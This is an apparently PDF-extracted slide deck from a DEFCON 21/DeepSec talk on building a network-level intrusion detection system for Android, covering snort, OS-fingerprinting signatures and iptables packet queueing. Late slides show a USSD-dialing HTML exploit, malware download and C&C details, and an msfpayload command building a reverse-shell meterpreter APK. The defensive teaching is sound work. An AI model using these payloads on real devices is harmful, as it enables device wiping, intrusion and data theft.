  • 10. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED DIRTY"USSD Poor"SSL/TLS"implementaGons" KernelKmode"driver"exploits NFC"VulnerabiliGes Android"Master"Key ... !!!"METERPRETER"FOR" ANDROID"!!! JAIME SÁNCHEZ (@SEGOFENSIVA) 10 DEFCON 21 DEEPSEC
  • 11. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Mobile"Pwn2Own"2013 !" One" exploit" took"advantage" of" two" Chrome"on"Nexus"4"vulnerabiliGes"–" an" integer" overflow"that"affects" Chrome"and"another"Chrome" vulnerability"that"resulted"in"a"full" sandbox"escape"and"the"possibility"of"remote"code"execuGon"on"the"affected"device. !"Two"exploits"compromised"apps"that"are"installed"on"all"Samsung"Galaxy"S4"devices. JAIME SÁNCHEZ (@SEGOFENSIVA) 11 DEFCON 21 DEEPSEC
  • 13. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED VPN eth0:WiFi rmnet0: 3G snort tcpdump Internet gateway !"In"order"to"analyze"the"traffic"flows"we’ll"create"a"VPN"tunnel"between"our" Android"device"and"our"computer. !" The" VPN" tunnel" uses" digital" cerGficates" (public/private" key" pair)" to" authenGcate"the"client"and"the"server. !"Using"digital"cerGficates"instead"of"a"shared"key"gives"higher"flexibility,"for" instance"we"can"revoke"access"in"case"if"the"smartphone"is"lost. JAIME SÁNCHEZ (@SEGOFENSIVA) 13 DEFCON 21 DEEPSEC
  • 14. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !"Once"the"VPN"tunnel"is"established" and" the" traffic" is" being" sent" to" the" VPS," we" can" start" monitoring" the" traffic"with"snort. !" We" will" take" advantage" of" two" main"signatures:" official" rules" (the" registered" version" rules)" and" the" Emerging" Threats" (Emerging" Threats). !" We" can" also" use" tools" like" tcpdump" to" capture" traffic" for" later" analysis. !"Wireshark"gives"a"much"beLer"view"of"the"content"and"the"qualiGes" of"each"IP"datagram"or"the"TCP"segments JAIME SÁNCHEZ (@SEGOFENSIVA) 14 DEFCON 21 DEEPSEC
  • 17. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" OSfooler" is" a" pracGcal" approach" presented" at" Black" Hat" Arsenal" USA" 2013. !" It" can" be" used" to" detect" and" defeat" acGve" and" passive" remote" OS" fingerprinGng"from"tools"like"nmap,"p0f"or"commercial"appliances. JAIME SÁNCHEZ (@SEGOFENSIVA) 17 DEFCON 21 DEEPSEC
  • 18. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED NMAP"INTERNAL"PROBES Fingerprint Linux 2.6.17 - 2.6.24 Class Linux | Linux | 2.6.X | general purpose SEQ(SP=A5-D5%GCD=1-6%ISR=A7-D7%TI=Z%II=I%TS=U) OPS(O1=M400C%O2=M400C%O3=M400C%O4=M400C%O5=M400C%O6=M400C) WIN(W1=8018%W2=8018%W3=8018%W4=8018%W5=8018%W6=8018) ECN(R=Y%DF=Y%T=3B-45%TG=40%W=8018%O=M400C%CC=N%Q=) T1(R=Y%DF=Y%T=3B-45%TG=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=Y%DF=Y%T=3B-45%TG=40%W=8018%S=O%A=S+%F=AS%O=M400C%RD=0%Q=) T4(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T5(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T7(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) U1(DF=N%T=3B-45%TG=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE(DFI=N%T=3B-45%TG=40%CD=S) Most"important: !"TCP"ISN"greatest"common"divisor"(GDC) !"TCP"IP"ID"sequence"generaGon"alg"(TI) !"TCP"Gmestamp"opGon"alg"(TS) !"TCP"OpGons"(O,"O1RO6) !"TCP"iniGal"Window"Size"(W,"W1RW6) !"Responsiveness"(R) !"IP"don’t"fragment"bit"(DF) !"IP"iniGal"GmeKtoKlive"guess"(TG) JAIME SÁNCHEZ (@SEGOFENSIVA) Although"there"are"others: !"TCP"ISN"counter"rate"(ISR) !"ICMP"IP"ID"sequence"generaGon"alg"(II) !"Shared"IP"ID"sequence"Boolean"(SS) !"Don’t"Fragment"ICMP"(DFI) !"Explicit"congesGon"noGficaGon"(C) !"TCP"miscellaneous"quirks"(Q) !"TCP"sequence"number"(S) !"etc. 18 NUIT DU HACK 2013 DEEPSEC
  • 19. OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN P0F"SIGNATURES 8192:32:1:48:M*,N,N,S:.:Windows:98 Opera&ng)System ""K"Family ""K"Version Packet) Size Quirks """K"Data"in"SYN"packets """K"OpGons"arer"EOL """K"IP"ID"Field"="0 """K"ACK"different"to"0 """K"Unusual"flags """K"Incorrect"opGons"decode DF)Bit) Ini&al)TTL TCP)op&ons)and)order Window)Size """K"N:"NOP """K"E:"EOL """K"Wnnn:"WS """K"Mnnn:"MSS """K"S:"SACK """K"T"/"T0:"Timestamp"" """K"?n """K"*"Any"value """K"%nnn"nnn"MulGple """K"Sxx"MSS"MulGple """K"Txx"MTU"MulGple """K"xxx"Constant"value JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) 16 19 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
  • 20. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" I" need" to" process" traffic" before" being"processed"inside"my"Android" device. !" I" can"redirect"all" network" packet" from"Kernel"Space"to"User"Space !"I"can"do"whatever"I"want"with"the" packets !"This"is"done"in"RealR7me. !" Runs" conGnuously" without" h u m a n" s u p e r v i s i o n" a n d" i s" completely"transparent"for"user. JAIME SÁNCHEZ (@SEGOFENSIVA) 20 DEFCON 21 DEEPSEC
  • 22. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED !"Computer"operaGng"systems"provide" different"levels"of"access"to"resources. Ring"3 !"This"is"generally"hardwareKenforced"by" some"CPU"architectures"hat"provide" different"CPU"modes"at"the"hardware"or" microcode"level. Ring"2 Ring"1 Ring"0 Kernel !"Rings"are"arranged"in"a"hierarchy"from" most"privileged"(most"trusted,"usually" numbered"zero)"to"least"privileged"(least" trusted). Devices Devices Devices Less Privileged JAIME SÁNCHEZ (@SEGOFENSIVA) More Privileged !"On"most"operaGng"systems,"RING"0"is" the"level"with"the"most"privileges"and" interacts"most"directly"with"the"physical" hardware"such"as"the"CPU"and"memory. 22 NUIT DU HACK 2013 DEEPSEC
  • 23. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED KERNEL"vs"USER"SPACE KERNEL"SPACE USER"SPACE KERNEL"SPACE)is)strictly)reserved)for)running)the)kernel,)kernel)extensions,)and)most)device) drivers.)In)contrast,)user) space)is)the)memory) area)where)all)user)mode)applica&ons)work) and)this)memory)can)be)swapped)out)when)necessary. Similarly,) the) term) USER" LAND) refers) to) all) applica&on) soKware) that) runs) in) user) space.) Userland)usually)refers)to)the)various)programs)and)libraries)that)the)opera&ng)system)uses) to)interact)with)the)kernel:) soKware) that) performs)input/output,) manipulates) file) system,) objects,)etc. JAIME SÁNCHEZ (@SEGOFENSIVA) 23 NUIT DU HACK 2013 DEEPSEC
  • 24. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED WTF"!? JAIME SÁNCHEZ (@SEGOFENSIVA) 24 NUIT DU HACK 2013 DEEPSEC
  • 25. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Internal Memory Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  • 26. OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN USER"SPACE APPLICATION read() TCP"recv"Buffer TCP"Process KERNEL"SPACE CONNTRACK Inbound"Packets MANGLE Socket Backlog PREROUTING FORWARD ip_rcv() IP"Layer forwarded"and"accepted"packets Pointer"to Device locally"desGned"packets"must"pass"the" INPUT"chains"to"reach"listening"sockets tcp_v4_rcv() FILTER NIC INPUT sorirq forwarded" packets Memory Kernel local packets Packet"Data Interrupt Handler Poll"List ConGnue"Processing Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) Incoming"Packet 27 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
  • 27. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  • 28. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  • 29. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED IPTABLES )A)target"extension"consists"of"a"KERNEL"MODULE,)and)an)op&onal)extension)to)iptables)to) provide)new)command)line)op&ons. There)are)several)extensions)in)the)default)NeRilter)distribu&on: JAIME SÁNCHEZ (@SEGOFENSIVA) 30 NUIT DU HACK 2013 DEEPSEC
  • 30. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED QUEUE !)QUEUE)is)an)iptables)and)ip6tables)target)which)which)queues"the"packet"for"userspace" processing. !)For)this)to)be)useful,)two)further)components)are)required: • a)QUEUE"HANDLER)which)deals)with)the)actual)mechanics)of)passing)packets)between) the)kernel)and)userspace;)and • a)USERSPACE"APPLICATION)to)receive,)possibly)manipulate,)and)issue)verdicts)on) packets. !)The)default)value)for)the)maximum)queue)length)is)1024.)Once)this)limit)is)reached,)new) packets)will)be)dropped)un&l)the)length)of)the)queue)falls)below)the)limit)again.) $ iptables -A INPUT -j NFQUEUE --queue-num 0 JAIME SÁNCHEZ (@SEGOFENSIVA) 31 13 NUIT DU HACK 2013 DEEPSEC
  • 32. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED The"logo"should"look"like"... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 33. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PLEASE!"don't"make"decisions"at" night"in"Las"Vegas JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 34. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED ANDROIDS !" Create" a" serious" open" source" networkKbased" intrusion" detecGon" system"(IDS)"and"networkKbased"intrusion"protecGon"system""(IPS)"has" the" ability" to"perform"realKGme" traffic"analysis"and" packet" logging" on" Internet"Protocol"(IP)"networks: !"It"should"feature: !"Protocol"analysis !"Content"searching !"Content"matching JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 35. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SENSOR !" Runs" conGnuously" and" without" human" supervision,"featuring: !"Analyze"traffic !" Send"push"alerts" to"the" Android"device" in"order"to"warn"the"user"about"the"threat !"Report"to"Logging"Server"Custom !"Deploy"some"reacGve"acGons: !"Drop"specific"packet !"Add"new"rule"in"iptables"firewall !"Launch"script"/"module !" Sync" aLack" signatures" to" keep" them" updated. !"It"should"impose"minimal"overhead. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 36. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SERVER Web Interface Android Device Internet Firewall IDS"Server"& Database !" The" server" is" running" inside" a" Linux" Box," and" is" receiving" all" the" messages"the"Android"sensor"is"sending. !"Server"is"responsible"for: !"Send"signatures"to"remote"devices !"Store"events"in"database !"Detects"staGsGcal"anomalies"&"analysis"realKGme. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 37. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MAYBE"ONE"DAY"... !" CollaboraGve" detecGon" and" detecGon" of" malware" propagaGon" paLerns"across"a"community"of"mobile"devices !"Evaluate"various"detecGon"algorithms !"Alert"about"a"detected"anomaly"when"it"persists !"More"reacGve"acGons: !"Uninstall"suspicious"applicaGon !"Kill"process !"Disconnect"radios !"Encrypt"data !"Monitor"system"calls"in"realKGme JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 38. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PROTOCOL"ANALYSIS LOOKS"LIKE"I"PICKED"THE"WRONG"WEEK TO"QUIT"SNIFFING"PACKETS JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 39. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED " !"Packet"with"FIN,"SYN,"PUSH"and"URG"flags"acGve." !"Report"to"the"Central"Logger"and"DROP"the"packet. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 40. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED REMOTE"OS"FINGERPRINTING !"Detect"and"drop"packet"sent"from"wellKknown"scanning"tools. !"nmap"OS"fingerprinGng"works"by"sending"up"to"16"TCP,"UDP,"and"ICMP"probes" to"known"open"and"closed"ports"of"the"target"machine. SEQUENCE"GENERATION"(SEQ,"OPS,"WIN"&"T1) ICMP"ECHO"(IE) TCP"EXPLICIT"CONGESTION"NOTIFICATION"(ECN) TCP"T2RT7 UDP JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 41. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PATTERN"MATCHING I’M"WATCHING"YOU... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 42. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SIGNATURE"FORMAT !"With"the"help"of"custom"build"signatures,"the"framework"can"also"be" used"to"detect"probes"or"aLacks"designed"for"mobile"devices " !"Useful"signatures"from"Snort"and"Emerging"Threats !"Convert"snortKlike"rules"to"a"friendly"format: JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 44. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android"2.0"USERAFTERRFREE"REMOTE"CODE"EXECUTION !) Does)not)properly)validate) floa&ngpoint)data,) which)allows)remote) a]ackers) to)execute) arbitrary)code)or)cause)a)denial)of)service. !)Executed)via)craKed)HTML)document. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 45. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED USSD"EXPLOIT !"A" USSD" code" is"entered"into"phones" to"perform" acGons. !" They" are" mainly" used" by" network" operators" to" provide" customers" with" easy" access" to" preK configured"services,"including: !"callKforwarding !"balance"inquiries !"mulGple"SIM"funcGons. !"The"HTML"code"to"execute"such"an"acGon"is"as"follows: <a#href="tel:xyz">Click#here#to#call</a> !"Example"exploit: <frameset>#<frame#src="tel:*2767*3855#"#/>#</#frameset> JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 46. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MALWARE !"ANDR.TROJAN.SMSSEND !"Download"from: !"hxxp://adobeflashplayerEup.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184" !"hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"hxxp://browsernewEupdate.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"Once"executed,"connect"to"C&C:""gaga01.net/rq.php !oard=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_i d=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;]me=XXXXXX;]mezo ne=XXXXXX !"Search"paLern:"rq.php !"METERPRETER !""It"features"command"history,"tab"compleGon," channels,"and"more. !"Let’s"try: $#msfpayload#android/meterpreter/reverse_tcp#LHOST=192.168.0.20#R#>#meter.apk $#file#meter.apk# ###meter.apk:#Zip#archive#data,#at#least#v2.0#to#extract JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  • 47. T H A N K Y O U! JAIME SÁNCHEZ (@SEGOFENSIVA) JSANCHEZ@SEGURIDADOFENSIVA.COM